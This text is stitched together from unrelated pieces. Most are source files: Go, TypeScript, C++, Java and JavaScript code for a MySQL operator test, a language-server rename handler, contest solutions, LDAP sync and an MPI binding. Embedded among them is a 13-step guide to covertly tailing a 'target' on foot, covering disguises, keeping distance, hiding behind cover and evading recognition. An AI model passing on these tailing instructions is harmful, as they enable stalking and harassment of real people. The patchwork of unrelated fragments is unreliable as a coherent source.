/* Copyright 2018 Pressinfra SRL Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ // nolint: errcheck package orchestrator import ( "fmt" "math/rand" "time" . "github.com/onsi/ginkgo" . "github.com/onsi/gomega" . "github.com/onsi/gomega/gstruct" gomegatypes "github.com/onsi/gomega/types" "golang.org/x/net/context" corev1 "k8s.io/api/core/v1" metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/apimachinery/pkg/types" "sigs.k8s.io/controller-runtime/pkg/client" "sigs.k8s.io/controller-runtime/pkg/manager" "sigs.k8s.io/controller-runtime/pkg/reconcile" api "github.com/presslabs/mysql-operator/pkg/apis/mysql/v1alpha1" "github.com/presslabs/mysql-operator/pkg/controller/internal/testutil" "github.com/presslabs/mysql-operator/pkg/internal/mysqlcluster" orc "github.com/presslabs/mysql-operator/pkg/orchestrator" fakeOrc "github.com/presslabs/mysql-operator/pkg/orchestrator/fake" ) var ( one = int32(1) two = int32(2) three = int32(3) ) var _ = Describe("Orchestrator controller", func() { var ( // channel for incoming reconcile requests requests chan reconcile.Request // stop channel for controller manager stop chan struct{} // controller k8s client c client.Client // orchestrator fake client orcClient *fakeOrc.OrcFakeClient //timeouts noReconcileTime time.Duration reconcileTimeout time.Duration ) BeforeEach(func() { orcClient = fakeOrc.New() // noReconcileTime + reconcileTimeout > reconcileTimePeriod so that in this time period only one reconcile happens. 
// noReconcileTime represents time required to pass without a reconcile happening (used with Consistently tests) // it is set to 95% of the reconcileTimePeriod noReconcileTime = reconcileTimePeriod * 95 / 100 // reconcileTimeout represents time to wait AFTER noReconcileTime has passed for a reconciliation to happen reconcileTimeout = 10 * (reconcileTimePeriod - noReconcileTime) var recFn reconcile.Reconciler mgr, err := manager.New(cfg, manager.Options{}) Expect(err).NotTo(HaveOccurred()) c = mgr.GetClient() recFn, requests = testutil.SetupTestReconcile(newReconciler(mgr, orcClient)) Expect(add(mgr, recFn)).To(Succeed()) stop = testutil.StartTestManager(mgr) }) AfterEach(func() { time.Sleep(1 * time.Second) close(stop) }) Describe("after creating a new mysql cluster", func() { var ( expectedRequest reconcile.Request cluster *mysqlcluster.MysqlCluster secret *corev1.Secret clusterKey types.NamespacedName ) BeforeEach(func() { clusterKey = types.NamespacedName{ Name: fmt.Sprintf("cluster-%d", rand.Int31()), Namespace: "default", } expectedRequest = reconcile.Request{ NamespacedName: clusterKey, } secret = &corev1.Secret{ ObjectMeta: metav1.ObjectMeta{Name: "the-secret", Namespace: clusterKey.Namespace}, StringData: map[string]string{ "ROOT_PASSWORD": "<PASSWORD>", }, } cluster = mysqlcluster.New(&api.MysqlCluster{ ObjectMeta: metav1.ObjectMeta{ Name: clusterKey.Name, Namespace: clusterKey.Namespace, }, Spec: api.MysqlClusterSpec{ // use .replicas as nil for testing purposes // Replicas: &one, SecretName: secret.Name, }, }) By("creating a new cluster") Expect(c.Create(context.TODO(), secret)).To(Succeed()) Expect(c.Create(context.TODO(), cluster.Unwrap())).To(Succeed()) // update ready nodes cluster.Status.ReadyNodes = 1 Expect(c.Status().Update(context.TODO(), cluster.Unwrap())).To(Succeed()) By("wait for a first reconcile event") // this is a synchronization event Eventually(requests, 4*time.Second).Should(Receive(Equal(expectedRequest))) }) AfterEach(func() { // manually delete all created resources because GC isn't enabled in // the test controller plane Expect(c.Delete(context.TODO(), secret)).To(Succeed()) // remove finalizers and delete the cluster c.Get(context.TODO(), clusterKey, cluster.Unwrap()) cluster.Finalizers = nil c.Update(context.TODO(), cluster.Unwrap()) c.Delete(context.TODO(), cluster.Unwrap()) }) It("should trigger reconciliation after noReconcileTime", func() { // expect to not receive any event when a cluster is created, but // just after reconcile time passed then receive a reconcile event Consistently(requests, noReconcileTime).ShouldNot(Receive(Equal(expectedRequest))) // wait for the second request Eventually(requests, reconcileTimeout).Should(Receive(Equal(expectedRequest))) }) It("should re-register cluster for orchestrator sync when re-starting the controller", func() { // restart the controller close(stop) var recFn reconcile.Reconciler mgr, err := manager.New(cfg, manager.Options{}) Expect(err).NotTo(HaveOccurred()) c = mgr.GetClient() recFn, requests = testutil.SetupTestReconcile(newReconciler(mgr, orcClient)) Expect(add(mgr, recFn)).To(Succeed()) stop = testutil.StartTestManager(mgr) // wait for a request Consistently(requests, noReconcileTime).ShouldNot(Receive(Equal(expectedRequest))) Eventually(requests, reconcileTimeout).Should(Receive(Equal(expectedRequest))) }) It("should unregister cluster when deleting it from kubernetes", func() { // delete the cluster Expect(c.Delete(context.TODO(), cluster.Unwrap())).To(Succeed()) // wait a few seconds for a request, in total, noReconcileTime + reconcileTimeout, // to catch a reconcile event. This is the request // that unregisters the cluster from orchestrator By("unregister nodes from orchestrator") Eventually(requests, noReconcileTime+reconcileTimeout).Should(Receive(Equal(expectedRequest))) _, err := orcClient.Cluster(cluster.GetClusterAlias()) Expect(err).ToNot(Succeed()) // this is the request that removes the finalizer and then the // cluster is deleted By("reconcile that removes the finalizer") Eventually(requests, noReconcileTime+reconcileTimeout).Should(Receive(Equal(expectedRequest))) // wait a few seconds without a request By("wait a few seconds without reconcile requests") Consistently(requests, 3*noReconcileTime).ShouldNot(Receive(Equal(expectedRequest))) }) It("should be registered in orchestrator", func() { // check the cluster is in orchestrator insts, err := orcClient.Cluster(cluster.GetClusterAlias()) Expect(err).To(Succeed()) Expect(insts).To(haveInstance(cluster.GetPodHostname(0))) }) It("should update the status after a sync", func() { // wait for reconciliation requests; those requests should ensure that the cluster node // status is updated as master By("wait for two reconcile requests") Eventually(requests, noReconcileTime+reconcileTimeout).Should(Receive(Equal(expectedRequest))) Eventually(requests, noReconcileTime+reconcileTimeout).Should(Receive(Equal(expectedRequest))) // get latest cluster values Expect(c.Get(context.TODO(), clusterKey, cluster.Unwrap())).To(Succeed()) // check for status to be updated Expect(cluster.GetNodeStatusFor(cluster.GetPodHostname(0))).To(haveNodeCondWithStatus(api.NodeConditionMaster, corev1.ConditionTrue)) }) }) }) // haveInstance returns a GomegaMatcher that checks if specified host is in // provided instances list func haveInstance(host string) gomegatypes.GomegaMatcher { return ContainElement(MatchFields(IgnoreExtras, Fields{ "Key": Equal(orc.InstanceKey{ Hostname: host, Port: 3306, }), })) }
import { Container } from 'aurelia-dependency-injection'; import { Position, Range, TextEdit, WorkspaceEdit, } from 'vscode-languageserver'; import { TextDocument } from 'vscode-languageserver-textdocument'; import { getWordInfoAtOffset } from '../../common/documens/find-source-word'; import { isViewModelDocument } from '../../common/documens/TextDocumentUtils'; import { ViewRegionUtils } from '../../common/documens/ViewRegionUtils'; import { AureliaProjects } from '../../core/AureliaProjects'; import { CustomElementRegion } from '../../core/regions/ViewRegions'; import { DocumentSettings } from '../configuration/DocumentSettings'; import { aureliaRenameFromViewModel } from './aureliaRename'; export async function onRenameRequest( document: TextDocument, position: Position, newName: string, container: Container ): Promise<WorkspaceEdit | undefined> { const documentSettings = container.get(DocumentSettings); const isViewModel = isViewModelDocument(document, documentSettings); if (isViewModel) { const renamed = aureliaRenameFromViewModel( container, documentSettings, document, position, newName ); return renamed; } const aureliaProjects = container.get(AureliaProjects); const targetProject = aureliaProjects.getFromUri(document.uri); if (!targetProject) return; const aureliaProgram = targetProject?.aureliaProgram; if (!aureliaProgram) return; const targetComponent = aureliaProgram.aureliaComponents.getOneByFromDocument(document); const regions = targetComponent?.viewRegions; if (!regions) return; const offset = document.offsetAt(position); const region = ViewRegionUtils.findRegionAtOffset(regions, offset); if (CustomElementRegion.is(region)) { const isInCustomElementStartTag = ViewRegionUtils.isInCustomElementStartTag( region, offset ); if (!isInCustomElementStartTag) { return normalRename(position, document, newName); } } if (region == null) { return; } // @ts-ignore TODO: implement rename for CustomElement const doRename = region.languageService.doRename; if (doRename) { const renamed = await doRename( aureliaProgram, document, position, newName, region ); // renamed; /* ? */ return renamed; } } function normalRename( position: Position, document: TextDocument, newName: string ) { const offset = document.offsetAt(position); const { startOffset, endOffset } = getWordInfoAtOffset( document.getText(), offset ); const startPosition = document.positionAt(startOffset); const endPosition = document.positionAt(endOffset + 1); // TODO: remove +1 (has to do with index 0 vs 1) const range = Range.create(startPosition, endPosition); return { changes: { [document.uri]: [TextEdit.replace(range, newName)], }, // documentChanges: [ // TextDocumentEdit.create( // { version: document.version + 1, uri: document.uri }, // [TextEdit.replace(range, newName)] // ), // ], }; }
#include<bits/stdc++.h> using namespace std; #define inf 1000000000 #define INF 1000000000000000 #define ll long long #define ull unsigned long long #define M (int)(1e9+7) #define P pair<int,int> #define PLL pair<ll,ll> #define FOR(i,m,n) for(int i=(int)m;i<(int)n;i++) #define RFOR(i,m,n) for(int i=(int)m;i>=(int)n;i--) #define rep(i,n) FOR(i,0,n) #define rrep(i,n) RFOR(i,n,0) #define all(a) a.begin(),a.end() #define IN(a,n) rep(i,n){ cin>>a[i]; } const int vx[4] = {0,1,0,-1}; const int vy[4] = {1,0,-1,0}; #define PI 3.14159265 #define F first #define S second #define PB push_back #define EB emplace_back #define int ll void init(){ cin.tie(0); ios::sync_with_stdio(false); } main(){ int q; cin>>q; /* running-median structure: q1 is a max-heap holding the lower half of the inserted values b, q2 a min-heap holding the upper half; the heaps are kept balanced so q1.top() is always a median */ priority_queue<int> q1; priority_queue<int,vector<int>,greater<int>> q2; int q1sum=0,q2sum=0; /* sums of the values stored in q1 and q2 */ int sum=0; /* accumulated constant costs c */ while(q--){ int a; cin>>a; if(a==1){ /* update query: f(x) += |x-b| + c */ int b,c; cin>>b>>c; sum+=c; if(q1.empty()){ q1.push(b); q1sum+=b; }else if(q1.top()>b){ /* b belongs to the lower half; rebalance if q1 grows too big */ q1.push(b); q1sum+=b; if(q1.size()-q2.size()>1){ q2.push(q1.top()); q2sum+=q1.top(); q1sum-=q1.top(); q1.pop(); } }else if(q2.empty()||q2.top()<b){ /* b belongs to the upper half; rebalance if q2 outgrows q1 */ q2.push(b); q2sum+=b; if(q2.size()-q1.size()>0){ q1.push(q2.top()); q1sum+=q2.top(); q2sum-=q2.top(); q2.pop(); } }else{ /* b fits between the two tops: push it onto the smaller heap */ if(q1.size()-q2.size()>0){ q2.push(b); q2sum+=b; }else{ q1.push(b); q1sum+=b; } } }else{ /* evaluation query: f(x)=sum|x-b_i|+sum c_i is minimized at the median x=q1.top(); the lower half contributes q1.size()*x-q1sum, the upper half q2sum-x*q2.size() */ int res=sum; res+=q1.size()*q1.top()-q1sum; res+=q2sum-q1.top()*q2.size(); // cout<<q1sum<<' '<<q2sum<<endl; cout<<q1.top()<<' '<<res<<endl; } // cout<<q1.size()<<' '<<q2.size()<<' '<<q1sum<<' '<<q2sum<<endl; } }
/** * @return {@literal true} if the token is renewable. */ protected boolean isTokenRenewable(VaultToken token) { return Optional.of(token).filter(LoginToken.class::isInstance) .filter(it -> { LoginToken loginToken = (LoginToken) it; return !loginToken.getLeaseDuration().isZero() && loginToken.isRenewable(); }).isPresent(); }
package modules import ( _ "hellclientswitch/modules/loggers" //Logger modules _ "hellclientswitch/modules/wsserver" ) //websocket modules
#include<bits/stdc++.h> using namespace std; typedef long long int ll; typedef long double ld; typedef pair<int,int> pi; typedef pair<ll,ll> pll; #define Max 1000001 #define inf INT_MAX #define llinf LONG_LONG_MAX #define fast ios_base::sync_with_stdio(false),cin.tie(NULL),cout.tie(NULL) #define pb push_back #define F first #define S second #define all_v v.begin(),v.end() #define E endl void solve() { /* a*b grid with a forbidden cell at (x,y) (0-indexed): the answer is the largest rectangle lying entirely on one side of that cell */ int a,b,x,y; cin>>a>>b>>x>>y; int ans1,ans2; int row=x+1; /* 1-indexed row of the cell */ if(a-row>=a/2) /* equivalent to picking max(a-row, row-1) full-width rows */ { ans1=(a-row) * b; } else { ans1= (row-1)*b; } int col=y+1; /* 1-indexed column of the cell */ if(b-col>=b/2) /* equivalent to picking max(b-col, col-1) full-height columns */ { ans2= a * (b-col); } else { ans2=a*(col-1); } int final=max(ans1,ans2); cout<<final<<endl; } int main() { fast; int t; cin>>t; while(t--) { solve(); } }
import { MongoMemoryServer } from 'mongodb-memory-server'; import mongoose from 'mongoose'; import assert from 'assert'; import cloudinary from "cloudinary"; import * as model from "../models/model"; import Place from '../models/place'; jest.mock('cloudinary'); let mockDB; describe('Testing models', () => { beforeAll(async () => { mockDB = new MongoMemoryServer(); const uri = await mockDB.getConnectionString(); await mongoose.connect(uri, { useNewUrlParser: true }); }); describe('Users collection', () => { it('adds a new user', async () => { await model.addUser('<EMAIL>', 'AA00000', 'Name', 'Fname'); const user = await model.getUserById('AA00000'); assert(user); }); it('updates a user', async () => { model.updateUser('AA00000', { name: 'OtherName' }); const name = await model.getUserById('AA00000').then(user => user.name); assert.equal(name, 'OtherName'); }); it('updates many users', async () => { await model.addUser('<EMAIL>', 'AA00001', 'Name', 'Fname'); model.updateManyUsers({ id: /AA0000\d/ }, { name: 'OtherName' }); const nameA = await model.getUserById('AA00000').then(user => user.name); const nameB = await model.getUserById('AA00001').then(user => user.name); assert.equal(nameA, 'OtherName'); assert.equal(nameB, 'OtherName'); }); it('gets a user by ID', async () => { const user = await model.getUserById('AA00000'); assert(user); }); it('gets all users', async () => { const users = await model.getUsers(); assert(users); }); it('checks user existence', async () => { assert(await model.userExists('AA00000')); assert(!(await model.userExists('BB11111'))); }); // Need to update the tests for image upload // it('updates a photo', async () => { // const imgUrl = 'https://mlpforums.com/uploads/monthly_10_2013/post-18536-0-17144400-1381282031.jpg'; // cloudinary.uploader = { // upload: jest.fn( // () => new Promise(resolve => resolve({ secure_url: imgUrl })), // ), // }; // await model.updatePhoto('AA00000', imgUrl); // const photo = await model.getUserById('AA00000').then(user => user.photo); // assert.equal(photo, imgUrl); // }); // it('uploads a photo', async () => { // const imgUrl = 'https://mlpforums.com/uploads/monthly_10_2013/post-18536-0-17144400-1381282031.jpg'; // const mock = jest.fn( // () => new Promise(resolve => resolve({ secure_url: imgUrl })), // ); // cloudinary.uploader = { // upload: mock, // }; // model.uploadPhoto('testID', imgUrl); // assert.equal(mock.mock.calls.length, 1); // assert.equal(mock.mock.calls[0][0], 'data:image/jpeg;base64,' + imgUrl); // const mock2 = jest.fn(() => new Promise((_, reject) => reject())); // cloudinary.uploader = { // upload: mock2, // }; // model.uploadPhoto('testID', imgUrl); // assert.equal(mock2.mock.calls.length, 1); // assert.equal(mock2.mock.calls[0][0], 'data:image/jpeg;base64,' + imgUrl); // }); it('matches user info', async () => { model.updateUser('AA00000', { fname: 'a', name: 'a', }); const user = await model.getUserById('AA00000'); const info = { fname: 'a', name: 'a', }; const info2 = { fname: 'a', name: 'b', }; const info3 = { fname: 'b', name: 'b', }; assert(model.matchUserInfo(user, info)); assert(!model.matchUserInfo(user, info2)); assert(!model.matchUserInfo(user, info3)); }); }); describe('Places collection', () => { it('adds a new place', async () => { await model.addPlace('JO-4-V-RER10'); const place = await model.getPlaceById('JO-4-V-RER10'); assert(place); await model.addPlace('JO-5-V-RER10', true, 'AB12345'); const placeB = await model.getPlaceById('JO-5-V-RER10');
assert(placeB); }); it('updates a place', async () => { model.updatePlace('JO-4-V-RER10', { using: true, id_user: 'AA00000' }); const place = await model .getPlaceById('JO-4-V-RER10') .then(place => ({ using: place.using, id_user: place.id_user })); assert.deepEqual(place, { using: true, id_user: 'AA00000' }); }); it('gets a place by ID', async () => { const place = await model.getPlaceById('JO-4-V-RER10'); assert(place); }); it('gets all places', async () => { const places = await model.getPlaces(); assert(places); }); it('gets the user using a place', async () => { const id_user = await model.whoUses('JO-4-V-RER10'); assert.equal(id_user, 'AA00000'); model.updatePlace('JO-4-V-RER10', { using: false, id_user: '' }); const noOne = await model.whoUses('JO-4-V-RER10'); assert(!noOne); const sharp = await model.whoUses('WrongID'); assert.equal(sharp, '#'); }); it('resets places', async () => { await model.addPlace('JO-4-V-RER11'); model.updatePlace('JO-4-V-RER11', { using: true, id_user: 'AA00000' }); await model.addPlace('JO-4-V-RER12'); model.updatePlace('JO-4-V-RER12', { using: true, id_user: 'AA00001' }); const mockB = jest.fn(); const mockA = jest.fn(() => ({ emit: mockB })); const websocket = { sockets: { adapter: { rooms: { 'JO-4-V-RER11': true, 'JO-4-V-RER12': false, }, }, }, in: mockA, }; const pooledUsers = await model.getPooledUsers(); await model.resetPlaces(websocket, pooledUsers); assert.equal(mockA.mock.calls.length, 1); assert.equal(mockB.mock.calls.length, mockA.mock.calls.length); assert.equal(mockA.mock.calls[0][0], 'JO-4-V-RER11'); assert.equal(mockB.mock.calls[0][0], 'leavePlace'); const places = await model.getPlaces(); assert(!places.some(x => x.using)); assert(!(await model.getUserById('AA00000')).pool); assert((await model.getUserById('AA00001')).pool); assert.equal(pooledUsers[pooledUsers.length - 1], 'AA00001'); }); it('gets all pooled users', async () => { const pooledUsers = await model.getPooledUsers(); assert(pooledUsers); }); }); afterAll(() => { mongoose.disconnect(); mockDB.stop(); }); });
import { AudioListener, Object3D, OrthographicCamera, PerspectiveCamera, Scene, XRFrame } from 'three' import type { UserId } from '@xrengine/common/src/interfaces/UserId' import { createHyperStore } from '@xrengine/hyperflux' import type { InputValue } from '../../input/interfaces/InputValue' import type { World } from '../classes/World' import type { Entity } from './Entity' export class Engine { static instance: Engine /** The uuid of the logged-in user */ userId: UserId store = createHyperStore({ name: 'ENGINE', getDispatchId: () => 'engine', getDispatchTime: () => Engine.instance.elapsedTime }) elapsedTime = 0 engineTimer: { start: Function; stop: Function; clear: Function } = null! isBot = false isHMD = false /** * The current world */ currentWorld: World = null! /** * All worlds that are currently instantiated */ worlds: World[] = [] /** * Reference to the three.js scene object. */ scene: Scene = null! /** * Map of object lists by layer * (automatically updated by the SceneObjectSystem) */ objectLayerList = {} as { [layer: number]: Set<Object3D> } /** * Reference to the three.js camera object (perspective or orthographic). */ camera: PerspectiveCamera | OrthographicCamera = null! activeCameraEntity: Entity = null! activeCameraFollowTarget: Entity | null = null /** * Reference to the audioListener. * This is a virtual listener for all positional and non-positional audio. */ audioListener: AudioListener = null! inputState = new Map<any, InputValue>() prevInputState = new Map<any, InputValue>() publicPath: string = null! simpleMaterials = false xrFrame: XRFrame isEditor = false } globalThis.Engine = Engine
/** * Updates the activity title. * Sets the title with a left and right title. * * @param rightText Right title part */ public void updateTitle(String rightText) { String timelinename = "??"; switch (mTimelineType) { case Tweets.TIMELINE_TYPE_FAVORITES: timelinename = getString(R.string.activity_title_favorites); break; case Tweets.TIMELINE_TYPE_FRIENDS: timelinename = getString(R.string.activity_title_timeline); break; case Tweets.TIMELINE_TYPE_MENTIONS: timelinename = getString(R.string.activity_title_mentions); break; case Tweets.TIMELINE_TYPE_MESSAGES: timelinename = getString(R.string.activity_title_direct_messages); break; } String username = MyPreferences.getDefaultSharedPreferences().getString(MyPreferences.KEY_TWITTER_USERNAME, null); String leftText = getString(R.string.activity_title_format, new Object[] { timelinename, username + (mSearchMode ? " *" : "") }); TextView leftTitle = (TextView) findViewById(R.id.custom_title_left_text); leftTitle.setText(leftText); TextView rightTitle = (TextView) findViewById(R.id.custom_title_right_text); rightTitle.setText(rightText); Button createMessageButton = (Button) findViewById(R.id.createMessageButton); if (mTimelineType != Tweets.TIMELINE_TYPE_MESSAGES) { createMessageButton.setText(getString(R.string.button_create_tweet)); } else { createMessageButton.setVisibility(View.GONE); } }
/// <reference path="./SimpleEventDispatcher.d.ts" />

// Wraps a listener so that it removes itself after its first invocation.
function makeOnce(listeners: ValidListener[], listener: ValidListener) {
  return function wrappedListener(arg: any) {
    runListener(listener, arg);
    removeListener(listeners, wrappedListener);
  };
}

export function isValidListener(listener: any): boolean {
  return listener && (
    (typeof listener == 'function') ||
    ('handleEvent' in listener && typeof listener.handleEvent == 'function')
  );
}

function addListener(listeners: ValidListener[], listener: ValidListener, once?: boolean) {
  if (!isValidListener(listener)) {
    throw new Error(`${listener} is not a valid listener`);
  }
  if (once) {
    listener = makeOnce(listeners, listener);
  }
  listeners.push(listener);
  // Return an unsubscribe function bound to the (possibly wrapped) listener.
  return removeListener.bind(null, listeners, listener);
}

function removeListener(listeners: ValidListener[], listener: ValidListener): boolean {
  const index = listeners.indexOf(listener);
  if (index < 0) { return false; }
  listeners.splice(index, 1);
  return true;
}

// Supports both plain functions and EventListener-style objects (handleEvent).
function runListener(listener: ValidListener, arg: any) {
  if ((<SimpleEventListenerObject>listener).handleEvent) {
    (<SimpleEventListenerObject>listener).handleEvent(arg);
  } else {
    (<SimpleEventListener>listener)(arg);
  }
}

function dispatchEvent(listeners: ValidListener[], arg?: any): boolean {
  if (!listeners.length) { return false; }
  // Iterate over a snapshot so listeners that remove themselves mid-dispatch
  // (e.g. `once` wrappers) do not cause the following listener to be skipped.
  for (const listener of listeners.slice()) {
    runListener(listener, arg);
  }
  return true;
}

function dispose(listeners: ValidListener[]): boolean {
  listeners.length = 0;
  return true;
}

function size(listeners: ValidListener[]): number {
  return listeners.length;
}

export function SimpleEventDispatcher(target?: Object): SimpleEventDispatcher {
  const listeners: ValidListener[] = [];
  const dispatcher = Object.assign(
    target || Object.create(null),
    {
      addEventListener: addListener.bind(null, listeners),
      removeEventListener: removeListener.bind(null, listeners),
      dispatchEvent: dispatchEvent.bind(null, listeners),
      dispose: dispose.bind(null, listeners),
      size: size.bind(null, listeners)
    }
  );
  return dispatcher;
}
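A short usage sketch of the factory above. The listener bodies and messages are illustrative only; the API calls match the bound methods returned by SimpleEventDispatcher.

const dispatcher = SimpleEventDispatcher()

// A plain function listener, registered for a single call via the `once` flag.
const unsubscribe = dispatcher.addEventListener((msg: string) => {
  console.log('received:', msg)
}, true)

// An EventListener-style object is also accepted (handleEvent duck typing).
dispatcher.addEventListener({ handleEvent: (msg: any) => console.log('obj:', msg) })

dispatcher.dispatchEvent('hello') // both listeners fire; the `once` one removes itself
dispatcher.dispatchEvent('again') // only the object listener fires
unsubscribe()                     // safe: returns false, the wrapper is already gone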
// compareOUs checks for differences between localOUs and ldapOUs and creates
// tasks to sync the LDAP target.
func compareOUs() error {
	var (
		i     int
		j     int
		match bool
		task  *actionTask
	)

	// Sort both slices by DN length so shorter (parent) DNs are processed first.
	sort.Slice(localOUs, func(i, j int) bool {
		return len(localOUs[i].dn) < len(localOUs[j].dn)
	})
	sort.Slice(ldapOUs, func(i, j int) bool {
		return len(ldapOUs[i].dn) < len(ldapOUs[j].dn)
	})

	// Queue a create task for every local OU that is missing from LDAP.
	for i = range localOUs {
		match = false
		for j = range ldapOUs {
			if localOUs[i].dn == ldapOUs[j].dn {
				match = true
				break
			}
		}
		if !match {
			glg.Debugf("marked intermediate OU for creation %s", localOUs[i].dn)
			task = new(actionTask)
			task.objectType = objectTypeOrganisationalUnit
			task.taskType = taskTypeCreate
			task.data = localOUs[i]
			taskList = append(taskList, task)
		}
	}

	// Queue a delete task for every LDAP OU that no longer exists locally.
	for i = range ldapOUs {
		match = false
		for j = range localOUs {
			if ldapOUs[i].dn == localOUs[j].dn {
				match = true
				break
			}
		}
		if !match {
			glg.Debugf("marked intermediate OU for deletion %s", ldapOUs[i].dn)
			task = new(actionTask)
			task.objectType = objectTypeOrganisationalUnit
			task.taskType = taskTypeDelete
			task.dn = ldapOUs[i].dn
			taskList = append(taskList, task)
		}
	}

	return nil
}
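The nested membership scans above are O(n*m). As a hedged illustration (in TypeScript, to match the other snippets in this document; the `OU` and `Task` shapes are assumptions mirroring the Go structs, not part of the original code), the same symmetric difference can be computed in O(n+m) with Set lookups:

interface OU { dn: string }
type Task = { type: 'create'; data: OU } | { type: 'delete'; dn: string }

// Computes create tasks for local OUs missing remotely and delete tasks for
// remote OUs missing locally, assuming dn uniquely identifies an OU.
function diffOUs(local: OU[], remote: OU[]): Task[] {
  const remoteDNs = new Set(remote.map(ou => ou.dn))
  const localDNs = new Set(local.map(ou => ou.dn))
  const tasks: Task[] = []
  for (const ou of local) {
    if (!remoteDNs.has(ou.dn)) tasks.push({ type: 'create', data: ou }) // missing in LDAP
  }
  for (const ou of remote) {
    if (!localDNs.has(ou.dn)) tasks.push({ type: 'delete', dn: ou.dn }) // stale in LDAP
  }
  return tasks
}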
1. Prepare the proper attire. Black is a bad idea; at all hours, you'll stick out like a sore thumb. Red attracts attention. Wear greys and greens. If the weather permits it, wear a hooded sweater or jacket.
2. Prepare disguises: fake glasses, caps, changes of clothes. If possible, go into a shop to change outfit.
3. Carry an empty bag (sports bag, rucksack, briefcase, etc.). If someone sees you, you can drop the bag off somewhere. People who recognized you with the bag may, surprisingly, not recognize you without it. (Make sure the bag matches your outfit; a hoodie and a briefcase would look out of place.)
4. Spot your target. See which direction they're headed in and how fast they are moving, and remember to keep this pace.
5. If there are many parked cars, outpace your target. You should be on the opposite side of the street from them. Get a little bit in front of the person you're tracking, then slow down to about their walking pace. (Be careful not to make too obvious a change; it will draw their attention.)
6. If the street is fairly empty, walk behind your target by about ten meters. If the weather isn't cold enough to make a bent head plausible, keep looking down at your watch.
7. Glance at your target only as often as you need to keep them in sight. Pretend that you're busy: walk around reading a book, etc.
8. Be prepared for your target to stop. If this happens, keep on walking nonchalantly. If you are behind your target, move in front until you have created that same ten-meter gap. At the nearest corner or parked van, or any other form of cover for that matter, hide and look back. Be careful not to be seen while doing so; count to three after hiding before looking back.
9. If you are seen, don't withdraw quickly. Instead, move away at a normal pace, as though you heard a noise behind you. Then continue walking, as though you did not recognize your quarry, until you find the next bit of suitable cover. (Note: if you are hiding in an indentation in a building, hold out a book, binder, or cell phone, and return your attention to it as you withdraw back into your spot.)
10. Prepare a last-resort escape in case you are recognized and your target begins to approach. Look at your watch or pretend to check a text message on your cell phone, then shout a curse or exclamation and run past your target at a dead run. Do not look directly at them. Logically, if you were avoiding them, you'd run the other way, so going past suggests you simply have somewhere to be. Then find a secure hiding spot (preferably on the other side of the street) and wait it out there. Keep an eye on your target, but sit tight.
11. If your target enters a building, how to proceed depends on the situation. If you plan on following the person as they emerge, get as far away from the entrance of the building as you can while still retaining the ability to recognize them if they leave.
12. Assuming that your target stops only briefly (for example, to make a call on a pay phone), be well ahead of your target while hiding. Make sure that you are across the street from them. Then, keeping your head down to keep from being recognized, allow them to walk past, giving them a distance of 15–20 meters (49.2–65.6 ft).
13. Resume following as before.
/**
 * Broadcast a message from the process with rank {@code root}
 * to all processes of the group.
 * <p>Java binding of the MPI operation {@code MPI_IBCAST}.
 * @param buf   buffer
 * @param count number of items in buffer
 * @param type  datatype of each item in buffer
 * @param root  rank of broadcast root
 * @return communication request
 * @throws MPIException Signals that an MPI error of some sort has occurred.
 */
public final Request iBcast(Buffer buf, int count, Datatype type, int root)
        throws MPIException {
    MPI.check();
    assertDirectBuffer(buf);
    Request req = new Request(iBcast(handle, buf, count, type.handle, root));
    // Keep a reference to the buffer so it is not garbage collected while
    // the non-blocking broadcast is still in flight.
    req.addSendBufRef(buf);
    return req;
}